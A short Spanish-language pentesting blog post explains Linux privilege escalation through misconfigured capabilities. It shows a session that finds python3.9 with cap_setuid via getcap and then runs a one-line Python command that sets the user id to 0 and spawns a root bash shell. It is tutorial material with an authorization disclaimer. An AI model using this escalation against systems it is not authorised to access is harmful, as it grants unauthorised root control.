~ / blog / pentesting
KALI

Privesc con capabilities

Las capabilities son permisos finos de root que se pueden dar a un binario sin hacerlo SUID completo, y mal usadas son una vía de escalada.

Con getcap buscas por todo el sistema binarios que tengan capabilities peligrosas. Por ejemplo, si python tiene cap_setuid, puedes usarlo para cambiar tu id a root en una línea.

Es una escalada sutil que muchos escaneos pasan por alto. Búscalas siempre.

# los comandos

www-data@victim:$ getcap -r / 2>/dev/nullcopiar
/usr/bin/python3.9 = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
www-data@victim:$ python3.9 -c 'import os;os.setuid(0);os.system("/bin/bash")'copiar
root@victim:# idcopiar
uid=0(root) gid=33(www-data)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.